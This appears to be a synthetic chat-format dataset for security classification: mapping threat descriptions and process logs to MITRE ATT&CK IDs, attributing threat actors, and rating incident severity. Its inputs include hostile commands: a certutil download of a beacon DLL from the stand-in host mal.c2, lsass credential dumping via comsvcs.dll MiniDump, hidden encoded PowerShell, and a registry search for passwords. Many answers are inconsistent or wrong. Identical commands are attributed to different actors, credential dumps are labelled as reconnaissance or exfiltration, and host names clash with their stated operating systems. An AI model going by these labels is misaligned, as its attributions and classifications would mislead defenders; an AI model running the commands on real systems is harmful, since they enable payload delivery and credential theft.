messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.146.231.65", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0009\"], \"tec...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempt...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-1UM76U76C1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Reconnaissance, Execution", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Zeus Panda searches for specific directories on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.104.252.198", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tech...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: USBStealer registers itself under a Registry Run key with the name \"USB Disk Security.\"", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Locations where profile.ps1 can be stored should be monitored for modifications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.013\", \"T1546\"]}", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2901 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.177.241.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2259 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-F5YSNJHJQW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Discovery", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\",...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.114.95.71", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071.0...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.168.3.144", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0043\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-FUKOIA81P0)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Turian has the ability to use /bin/sh to execute commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.004\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for the unexpected deletion or absence of cloud block storage volumes .", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1578\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3258 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-TJ6K4ZMUVZ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Execution, Lateral Movement", "role": "user" }, { "content": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-MZKQTYJBCH)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Doki has executed shell scripts with /bin/sh.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.004\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Taidoor has been delivered through spearphishing emails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Neoichor can collect the OS version and computer name from a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 674 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-AQSE81UEDJ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Exfiltration, Lateral Movement", "role": "user" }, { "content"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"tech...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Chimera has used scheduled tasks to invoke Cobalt Strike including through batch script schtasks /create /ru \"SYSTEM\" /tn \"update\" /tr \"cmd /c c:\\windows\\temp\\update.bat\" /sc once /f /st and to maintain pers...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor executed commands and arguments for suspicious commands to modify accounts or account settings (including files such as the authorized_keys or /etc/ssh/sshd_config).", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.003\", \"T1027\"]}", "role": "a...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-DYV5MDF2CD)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Command and Control", "role": "user" }, { "content": "{\"s...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3884 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.10.29.20", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: There are many Windows API calls a payload can take advantage of to manipulate access tokens (, LogonUser , DuplicateTokenEx, and ImpersonateLoggedOnUser).", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1672 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: reg query HKLM /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-X8O3MKMG3B)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Impact, Reconnaissance", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T10...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-4AFKIUOZ84)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-315439WBY3)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Execution", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Modification of firewall rules might also consider opening local ports and services for different network profiles such as public and domain.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-708H3KN2D2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-SBKS8SWBZX)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-UPRIRHSDRQ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Execution, Lateral Movement", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-3XOHBXMDY7)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Lateral Movement, Exfiltration", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-552PA3IJNZ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-676WNCA936)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Reconnaissance, Collection", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.", "role": "user" }, ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-PPM44C32N5)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT38 have enumerated files and directories, or searched in specific locations within a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-QPX5LMRNSQ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Collection, Initial Access", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-T7H04JS710)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3470 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.121.103.101", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-JPL2KFB1JW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Persistence", "role": "user" }, { "...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cobalt Strike can use self signed Java applets to execute signed applet attacks.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "role": "as...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BLACKCOFFEE has the capability to enumerate files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor process API calls to AddMonitor.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.010\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: zwShell can obtain the name of the logged-in user on the victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2503 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.21.71.150", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0043\"], \"techniques\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-WO4VQD9F92)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.42.250.79", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3676 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-251O3BK2K3)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"High\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: An APT3 downloader uses the Windows command \"cmd.exe\" /C whoami.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2017 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-AJSABPOV8S)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Collection, Execution", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-VFMGBFTKVO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-090NLNHQZA)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Initial Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2130 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assista...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-LKOYPNF58H)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Initial Access", "role": "user" }, { "content...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.53.115.79", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0010\"], \"techniques\": [\"T1098.004...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-NM4W572YVE)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Exfiltration, Initial Access", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: environmental keying", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: NOKKI can collect data from the victim and stage it in LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.Much of this activity will take place o...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.127.25.110", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"t...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: CallMe uses AES to encrypt C2 traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor command-line execution of the launchctl command immediately followed by abnormal network connections.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.001\", \"T1569\"]}", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LNJ8HJYYWY)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Privilege Escalation, Command and Control", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.0.186.222", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0007\", \"TA0043\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 913 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1534\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKCU\\Software\\Microsoft\\Office test\\Special\\Perf", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: OS Credential Dumping can be used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"tech...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-RCFJA343GO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Credential Access", "role": "user" }, { "c...